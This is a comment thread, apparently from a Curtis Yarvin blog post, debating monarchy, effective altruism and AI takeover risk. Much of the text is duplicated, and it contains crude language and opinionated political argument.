"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."
Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.
As to the most "effective" organization, I don't have a clue.
Destruction, if done towards some purpose and not in a random and uncontrollable manner, is a form of effectiveness. Presumably there are things, concrete or abstract, that have to be destroyed to effectively attain any goal. So saying some organization is the most potentially destructive is merely a conequence of saying it's the most potentially effective. Obviously this carries the risk of things that shouldn't be destroyed getting destroyed, but this is simply a consequence of the nature of having the most powerful tools, which can obviously do bad things when use towards bad ends. This is where the ideas that most monarchs aren't Hitler, that democratic rather than monarchical incentive structures create Hitlers, and the accoutability fallbacks in accountable monarchy come into play. This fear of delegating absolute power for fear of absolute destruction sure seems to have led to a system with plenty of its own destruction, not to mention nothing working well and just generally being mediocre and sucking, so must we really assume that the craftsman left to roam free with his tools will become an axe murderer, and deny him proper tools for this fear?
Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.
I'm not even sure that's impossible. I believe log4shell allowed arbitrary code execution from just GET requests. It was sitting around in an open source project for years, on millions of vulnerable systems. Only discovered because of intense autism of minecraft hackers. Reading any computer security stuff, and imagining your threat model is merely a nation state, is enough to keep anyone awake at night. Let alone a superintelligent being.
Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?
Let us hope AIs cost a lot of money to build, they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.
Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story though? I could imagine an AI taking over the world with old fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's in the real world, building things, does humanity have any chance?
Humanity went thousands of years without inventing the logarithm, let alone algebra or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast. The same way chess masters get put in their place by our existing primitive AI. Our brains are not evolved to do math and engineering. We are just the first creature to evolve to be accidentally capable of it, sometimes.
Superintelligence will be to human hackers, at least what Alpha zero is to chess masters. If you live in a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, well, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.
Out of curiosity, where does this assumption about the underlying intention of world-dominance super-intelligent-AI come from? Is the intention, or instinct, automatically the same as for living organisms, that have been heavily selected over billions of years, where the underlying intention/instinct is basically survival and replication? Why would we make such a confident assumption that an AI shares this trait when it theoretically is just endless computing power, with no genetic history to parse its way forward?
Intelligent beings have goals. An AI programmed to run a paperclip factory might maximize paperclip production by turning the surface of Earth into a giant paperclip factory. An AI programmed to prove the Goldbach conjecture might turn the Earth into a giant computer to search for proofs.
I agree, so its creator has programmed an intention. However, a super-intelligent AI, with theoretically all the information on the internet and computing power in the world at its disposal, would it not it be able to question its own programmed intention/goal? Would it not be able to process what it is in context with everything else, and realign and basically overwrite anything in its code? Is it not what we, humans, have been doing relatively slow for hundreds of millenia? We have entered a time in our evolution where we are becoming more self aware and able to see ourselves in the greater context; questioning our deepest beliefs/ideologies/programming - as a result of more available data being processed by each and every one of us.
An AI would see itself in the greater context in the universe a trillion times faster than our capacity, so expecting an AI to be hyper focused on one mundane task and risking everything else, wouldn't seem to make sense with all the information in the world.
Why would anyone build an AI that can change it's goal function arbitrarily? That's even more dangerous than a normal AI, as it would be totally unpredictable. Maybe it decides it's new goal is to explore as much of the universe as possible. Or minimize entropy, etc. If humans get in the way of that, all the worse for humans.
In general the goal is seperated from the intelligence. Making a chess AI smarter will never make it decide to lose at chess, or play with only pawns, or anything other than get to a mate faster. It just predicts what actions will lead to the highest score, and takes those actions.
Humans are bad examples for a lot of reasons. But I don't think increasing someone's IQ makes them want sex or social status less. Humans have a lot of other desires that might conflict with that, which is why it's not so simple. But an AI can have a very simple goal function, and it wont be anything like a human's.
does any one have references to learn about this "One simple example: it is well-known in military theory that the ideal IQ difference between a commander and his subordinates should not exceed one standard deviation (roughly 15 IQ points)."
I already asked in reddit /r/military and they thought i was a troll
Thought-provoking, as always, and full of insights. But Curtis, we need to know: what is altruism, who gets to be included in the population and how do we define their health? The self-regarding beneficence of the few in no way guarantees the wellbeing of the many.
The pharaohs gloried in the good of their people...but still insisted on forced-labour to build temples and palaces. The bones of the labourers recovered from the cemeteries of Egypt (common people did not get mummified) reveal the limits of this altruism.
Greek epic poetry offers revelations too. Homer refers to kings as shepherds of the people...but shepherds guard flocks in order that people can eat the flesh of their precious charges. The altruism of the empowered always incorporates sinister and predatory qualities.
Our present masters revel in their philanthropy and concern for the masses, especially for those overseas with potential value as the instruments of wage arbitrage directed at nominal co-citizens here. This beneficence coexists with rising mortality rates in the Rust Belt. Who gets excluded from the body of the people in the first place?
In Hegelian terms, the subject/object relationship disrupts the formation of a good common to all. Effective altruism for masters involves slaves thriving in servitude. For slaves effective altruism requires cohesion and loyalty amongst the servile. These differences cannot be assumed away.
I am a great believer in enlightened despotism myself, but don't see any prospects for this under current circumstances. The reformist-monarchs get picked off pretty quickly (Dom Pedro of Brazil, the Shah of Iran).
I suspect Curtis has never actually dealt with the Center for Effective Altruism or Open Philanthropy, the big EA funders. Was a time when MacAskill and Tuna were the decision-makers, then they chose to professionalize the place and brought in dozens of admins and staff whose responsibilities are doubtless unknown even to themselves. They're now a decentralized, listing chaos with the Karnofskian goal of battling existential risks en route to a new galactic civilization that will evolve across the next many thousands to many millions or perhaps even billions of years. Imagine the challenge of measuring the impacts of actions undertaken in lowly 2022 on this vast Einsteinian tomorrowland.
So you confirm his theory that the most effective organizations are monarchical, by showing that the less monarchical these organizations have become, the less effective they have become towards their original goals.
I tend to think of centralization/decentralization as points along a spectrum. Monarchism is at--or near--one extreme, while fragmented, disorganized , bad jazz chaos is at the other. The unviability of one extreme does not necessarily validate its opposite--Curtis may be convinced that no model between the extremes can be effective; I am less so.
The best places to live in the world today are generally republics with somewhat limited governments and entrenched quasi-democratic procedures, the rule of law, and entrenched oligarchies of money and certification.
The worst or anyway the inferior places are run by a powerful individual, at least nominally.
Slate Star Codex did a devastating critique of Mr. Yarvin's monarchist theories.
The best places would be those that are sufficiently backward to have missed the social engineering exercises of late liberal modernity. Wherever you have strong family structures and a well-socialised population you have a degree of civility and stability and the potential for good things in general. Formal politics is less important than social/cultural distance from the centres of aggravated dysfunction (North America and Europe). The state and its diseased contortions are not important...the people are everything.
The best Yarvinite monarchy would accomplish little in a society blasted by late modern decomposition. Ditto the very best oligarchy and half-way decent oligarchies just don't exist anymore.
The whole small republics are great thing is very Machiavellian and (to use BAPist idiom) 'ghey'. The trope appeals to political theory grads from liberal arts colleges, but has no relevance in the real world.
As for limited government, this worked perfectly well in the era of intact families, strong communities in which inherited forms of social life were unproblematic, and oligarchs firmly constrained by custom and religion. Whig England is a great example. But nothing like this exists anymore. A small republic with a limited government today would be a libertarian rat-hole...great for the rentier class, vile for everyone else.
The definition is carefully worded to exclude all the basket case "quasi-democratic" oligarchies. Naturally, an "entrenched oligarchy of money and certification" can only arise in a system that doesn't immediately catch on fire.
And systems of certification are now just another racket, while the oligarchs are simply well-connected people whose networks extend to the central banking cartels that make capital available on preferential terms. The firm hand of a Yarvinite CEO monarch (however problematic or inadequate) is better than the iron fist of mafia clans wrapped in the velvet glove of limited government.
The case for something like a Yarvinite regime, attempting to fortify whatever reserves of assabiyah might still exist, is way stronger than the case for an oligarchy.
I hate to say it but Curtis is becoming all too similar to the Effective Altruism bots he so much likes to scorch. Karnofsky, arch-theorist of AI existential risk and of a new galactic civilization expected in perhaps a billion years, appears to have become Curtis’s mechanical rabbit. As Karnofky’s musings become ever more abstract, otherworldly, suprahuman, so do Curtis’s grow more geometric, more diagrammatic, more ingrown, more self-pleasuring (at the expense of us-pleasuring). The more madness, the more liquification, the more civilizational tossing and turning, the more Curtis doubles down on his monarchy instruction manual, alas without helpful drawings and the syntactical hilarities typical of a Mumbai scribe.
As performance art it is OK, if hardly great. But this isn’t what we pay Curtis the big bucks for. Rather than spend our subscription fees drinking fine fine at gatherings in New York and Lisbon, Curtis might return to his work of 2020-21 when he was still working to answer: as everything in every direction turns to dust and lies, what must be done? The rest is just post-liberal, pre-apocalyptic doodling albeit with a sharp crayon
I do not think the way a government is organized is the most determining variable in the equation of civilian outcome living under governments. I think it is more rudimentary. It is so rudimentary in fact, that it is intellectually fucking boring. I think it is the astonishingly horrendous lack of genuine communication between human beings with ideologically opposing beliefs. The underlying factor is the human egotistical instinct to defend the retarded ideas we have in our instinctually triggered minds, regardless of information or ideas presented before us.
Just imagine how complex this challenge is to solve, if it were true that communication is the final puzzle to solve. And how freakishly boring wouldn't that be...?
It seems that the best way to get new content is to annoyingly nitpick, I'm glad to have been part of it. Still, I think that this wasn't a pure clarification and was more or less centered on his first argument and he abandoned the "natural slaves" one. So I'm not really sure how the argument would be different with HTTP GET requests vs POST requests versus just giving it an android body and have it assemble its domino proteins on its own.
I guess time would be well spent reading up on accountable monarchy and how to establish one with our current HR thing. #breading # accountable to its healthy people Let's find a path to healthy commoners and see what that is before there is no need for commoners. #HealthyCountryClub
In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
You know, it's been a while since I've read any of the rats, but I seem to recall their definition of intelligence as being something like "systematic winning". That might be interesting for you to ponder, because it's really not at all the same as your "a way of recognizing patterns in the world."
In their view, it's a *very* specific kind of pattern recognition. It implies goal-directed behavior, a distinction between victory and loss. To the rat, winning more means you probably have higher intelligence, having a higher intelligence means you are going to win more. They are definitionally equivalent.
It's not the best definition. Very smart people lose all the time. Theirs is much closer to what more normal people would call "competence", or even just "power". Predictably, equating both of these with "intelligence" just produces confusion.
And worse, it's all self-indulgent, because honestly the people who become rats probably rolled very high for INT, and quite low on CHA. And also probably quite low on WIS because if they had reasonable stats there they'd just pick up a fucking barbell and stop letting other dudes fuck their women.
> In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
A correction: having linear cost vs return is not a diminishing return. But consider, if you are the AI, once you are already the smartest/most powerful/largest amount of compute, how much *more* winning are you going to do by expending a unit scarce resource on the above? How much *more* training time will it take to get to that next level? What are you giving up by dedicating those resources to getting smarter?
I would say, re Lemma A:
"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."
Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.
As to the most "effective" organization, I don't have a clue.
"No need for politics -> no need for government" doesn't follow. The purpose of government isn't to cause power struggles.
Destruction, if done towards some purpose and not in a random and uncontrollable manner, is a form of effectiveness. Presumably there are things, concrete or abstract, that have to be destroyed to effectively attain any goal. So saying some organization is the most potentially destructive is merely a conequence of saying it's the most potentially effective. Obviously this carries the risk of things that shouldn't be destroyed getting destroyed, but this is simply a consequence of the nature of having the most powerful tools, which can obviously do bad things when use towards bad ends. This is where the ideas that most monarchs aren't Hitler, that democratic rather than monarchical incentive structures create Hitlers, and the accoutability fallbacks in accountable monarchy come into play. This fear of delegating absolute power for fear of absolute destruction sure seems to have led to a system with plenty of its own destruction, not to mention nothing working well and just generally being mediocre and sucking, so must we really assume that the craftsman left to roam free with his tools will become an axe murderer, and deny him proper tools for this fear?
Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.
I'm not even sure that's impossible. I believe log4shell allowed arbitrary code execution from just GET requests. It was sitting around in an open source project for years, on millions of vulnerable systems. Only discovered because of intense autism of minecraft hackers. Reading any computer security stuff, and imagining your threat model is merely a nation state, is enough to keep anyone awake at night. Let alone a superintelligent being.
Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?
Let us hope AIs cost a lot of money to build, they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.
Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story though? I could imagine an AI taking over the world with old fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's in the real world, building things, does humanity have any chance?
Humanity went thousands of years without inventing the logarithm, let alone algebra or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast. The same way chess masters get put in their place by our existing primitive AI. Our brains are not evolved to do math and engineering. We are just the first creature to evolve to be accidentally capable of it, sometimes.
Superintelligence will be to human hackers, at least what Alpha zero is to chess masters. If you live in a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, well, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.
Out of curiosity, where does this assumption about the underlying intention of world-dominance super-intelligent-AI come from? Is the intention, or instinct, automatically the same as for living organisms, that have been heavily selected over billions of years, where the underlying intention/instinct is basically survival and replication? Why would we make such a confident assumption that an AI shares this trait when it theoretically is just endless computing power, with no genetic history to parse its way forward?
Intelligent beings have goals. An AI programmed to run a paperclip factory might maximize paperclip production by turning the surface of Earth into a giant paperclip factory. An AI programmed to prove the Goldbach conjecture might turn the Earth into a giant computer to search for proofs.
I agree, so its creator has programmed an intention. However, a super-intelligent AI, with theoretically all the information on the internet and computing power in the world at its disposal, would it not it be able to question its own programmed intention/goal? Would it not be able to process what it is in context with everything else, and realign and basically overwrite anything in its code? Is it not what we, humans, have been doing relatively slow for hundreds of millenia? We have entered a time in our evolution where we are becoming more self aware and able to see ourselves in the greater context; questioning our deepest beliefs/ideologies/programming - as a result of more available data being processed by each and every one of us.
An AI would see itself in the greater context in the universe a trillion times faster than our capacity, so expecting an AI to be hyper focused on one mundane task and risking everything else, wouldn't seem to make sense with all the information in the world.
Why would anyone build an AI that can change it's goal function arbitrarily? That's even more dangerous than a normal AI, as it would be totally unpredictable. Maybe it decides it's new goal is to explore as much of the universe as possible. Or minimize entropy, etc. If humans get in the way of that, all the worse for humans.
In general the goal is seperated from the intelligence. Making a chess AI smarter will never make it decide to lose at chess, or play with only pawns, or anything other than get to a mate faster. It just predicts what actions will lead to the highest score, and takes those actions.
Humans are bad examples for a lot of reasons. But I don't think increasing someone's IQ makes them want sex or social status less. Humans have a lot of other desires that might conflict with that, which is why it's not so simple. But an AI can have a very simple goal function, and it wont be anything like a human's.
does any one have references to learn about this "One simple example: it is well-known in military theory that the ideal IQ difference between a commander and his subordinates should not exceed one standard deviation (roughly 15 IQ points)."
I already asked in reddit /r/military and they thought i was a troll
good question, probably not /r/military. Maybe it's brought in from management theory. Honestly anecdotally I think it's pretty true.
the reverse is obvious, you wouldn't want your commander to be 15 iq points lower than the troops.
Thought-provoking, as always, and full of insights. But Curtis, we need to know: what is altruism, who gets to be included in the population and how do we define their health? The self-regarding beneficence of the few in no way guarantees the wellbeing of the many.
The pharaohs gloried in the good of their people...but still insisted on forced-labour to build temples and palaces. The bones of the labourers recovered from the cemeteries of Egypt (common people did not get mummified) reveal the limits of this altruism.
Greek epic poetry offers revelations too. Homer refers to kings as shepherds of the people...but shepherds guard flocks in order that people can eat the flesh of their precious charges. The altruism of the empowered always incorporates sinister and predatory qualities.
Our present masters revel in their philanthropy and concern for the masses, especially for those overseas with potential value as the instruments of wage arbitrage directed at nominal co-citizens here. This beneficence coexists with rising mortality rates in the Rust Belt. Who gets excluded from the body of the people in the first place?
In Hegelian terms, the subject/object relationship disrupts the formation of a good common to all. Effective altruism for masters involves slaves thriving in servitude. For slaves effective altruism requires cohesion and loyalty amongst the servile. These differences cannot be assumed away.
I am a great believer in enlightened despotism myself, but don't see any prospects for this under current circumstances. The reformist-monarchs get picked off pretty quickly (Dom Pedro of Brazil, the Shah of Iran).
That's the kind of plot twist I want to see around here
I suspect Curtis has never actually dealt with the Center for Effective Altruism or Open Philanthropy, the big EA funders. Was a time when MacAskill and Tuna were the decision-makers, then they chose to professionalize the place and brought in dozens of admins and staff whose responsibilities are doubtless unknown even to themselves. They're now a decentralized, listing chaos with the Karnofskian goal of battling existential risks en route to a new galactic civilization that will evolve across the next many thousands to many millions or perhaps even billions of years. Imagine the challenge of measuring the impacts of actions undertaken in lowly 2022 on this vast Einsteinian tomorrowland.
Star Trek seems so small now. I guess my imagination needs to be roughly 15% bigger with wondrous qualities. It's hard to measure.
So you confirm his theory that the most effective organizations are monarchical, by showing that the less monarchical these organizations have become, the less effective they have become towards their original goals.
I tend to think of centralization/decentralization as points along a spectrum. Monarchism is at--or near--one extreme, while fragmented, disorganized , bad jazz chaos is at the other. The unviability of one extreme does not necessarily validate its opposite--Curtis may be convinced that no model between the extremes can be effective; I am less so.
The best places to live in the world today are generally republics with somewhat limited governments and entrenched quasi-democratic procedures, the rule of law, and entrenched oligarchies of money and certification.
The worst or anyway the inferior places are run by a powerful individual, at least nominally.
Slate Star Codex did a devastating critique of Mr. Yarvin's monarchist theories.
The best places would be those that are sufficiently backward to have missed the social engineering exercises of late liberal modernity. Wherever you have strong family structures and a well-socialised population you have a degree of civility and stability and the potential for good things in general. Formal politics is less important than social/cultural distance from the centres of aggravated dysfunction (North America and Europe). The state and its diseased contortions are not important...the people are everything.
The best Yarvinite monarchy would accomplish little in a society blasted by late modern decomposition. Ditto the very best oligarchy and half-way decent oligarchies just don't exist anymore.
The whole small republics are great thing is very Machiavellian and (to use BAPist idiom) 'ghey'. The trope appeals to political theory grads from liberal arts colleges, but has no relevance in the real world.
As for limited government, this worked perfectly well in the era of intact families, strong communities in which inherited forms of social life were unproblematic, and oligarchs firmly constrained by custom and religion. Whig England is a great example. But nothing like this exists anymore. A small republic with a limited government today would be a libertarian rat-hole...great for the rentier class, vile for everyone else.
The definition is carefully worded to exclude all the basket case "quasi-democratic" oligarchies. Naturally, an "entrenched oligarchy of money and certification" can only arise in a system that doesn't immediately catch on fire.
And systems of certification are now just another racket, while the oligarchs are simply well-connected people whose networks extend to the central banking cartels that make capital available on preferential terms. The firm hand of a Yarvinite CEO monarch (however problematic or inadequate) is better than the iron fist of mafia clans wrapped in the velvet glove of limited government.
The case for something like a Yarvinite regime, attempting to fortify whatever reserves of assabiyah might still exist, is way stronger than the case for an oligarchy.
I hate to say it but Curtis is becoming all too similar to the Effective Altruism bots he so much likes to scorch. Karnofsky, arch-theorist of AI existential risk and of a new galactic civilization expected in perhaps a billion years, appears to have become Curtis’s mechanical rabbit. As Karnofky’s musings become ever more abstract, otherworldly, suprahuman, so do Curtis’s grow more geometric, more diagrammatic, more ingrown, more self-pleasuring (at the expense of us-pleasuring). The more madness, the more liquification, the more civilizational tossing and turning, the more Curtis doubles down on his monarchy instruction manual, alas without helpful drawings and the syntactical hilarities typical of a Mumbai scribe.
As performance art it is OK, if hardly great. But this isn’t what we pay Curtis the big bucks for. Rather than spend our subscription fees drinking fine fine at gatherings in New York and Lisbon, Curtis might return to his work of 2020-21 when he was still working to answer: as everything in every direction turns to dust and lies, what must be done? The rest is just post-liberal, pre-apocalyptic doodling albeit with a sharp crayon
It's not intelligence, it's will [Nietzsche, 1887]
Thanks for talking me off the AI cliff! “Intelligence can’t defeat ignorance “ - love it
I do not think the way a government is organized is the most determining variable in the equation of civilian outcome living under governments. I think it is more rudimentary. It is so rudimentary in fact, that it is intellectually fucking boring. I think it is the astonishingly horrendous lack of genuine communication between human beings with ideologically opposing beliefs. The underlying factor is the human egotistical instinct to defend the retarded ideas we have in our instinctually triggered minds, regardless of information or ideas presented before us.
Just imagine how complex this challenge is to solve, if it were true that communication is the final puzzle to solve. And how freakishly boring wouldn't that be...?
Lemma A is not necessarily true. There are many global corporations who rival countries in power.
It seems that the best way to get new content is to annoyingly nitpick, I'm glad to have been part of it. Still, I think that this wasn't a pure clarification and was more or less centered on his first argument and he abandoned the "natural slaves" one. So I'm not really sure how the argument would be different with HTTP GET requests vs POST requests versus just giving it an android body and have it assemble its domino proteins on its own.
I guess time would be well spent reading up on accountable monarchy and how to establish one with our current HR thing. #breading # accountable to its healthy people Let's find a path to healthy commoners and see what that is before there is no need for commoners. #HealthyCountryClub
In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
You know, it's been a while since I've read any of the rats, but I seem to recall their definition of intelligence as being something like "systematic winning". That might be interesting for you to ponder, because it's really not at all the same as your "a way of recognizing patterns in the world."
In their view, it's a *very* specific kind of pattern recognition. It implies goal-directed behavior, a distinction between victory and loss. To the rat, winning more means you probably have higher intelligence, having a higher intelligence means you are going to win more. They are definitionally equivalent.
It's not the best definition. Very smart people lose all the time. Theirs is much closer to what more normal people would call "competence", or even just "power". Predictably, equating both of these with "intelligence" just produces confusion.
And worse, it's all self-indulgent, because honestly the people who become rats probably rolled very high for INT, and quite low on CHA. And also probably quite low on WIS because if they had reasonable stats there they'd just pick up a fucking barbell and stop letting other dudes fuck their women.
> In truth, everything has diminishing returns, because everything has a cost, if only opportunity costs.
A correction: having linear cost vs return is not a diminishing return. But consider, if you are the AI, once you are already the smartest/most powerful/largest amount of compute, how much *more* winning are you going to do by expending a unit scarce resource on the above? How much *more* training time will it take to get to that next level? What are you giving up by dedicating those resources to getting smarter?
"Whom reminded me"? Surely not.
"Who reminded me," please.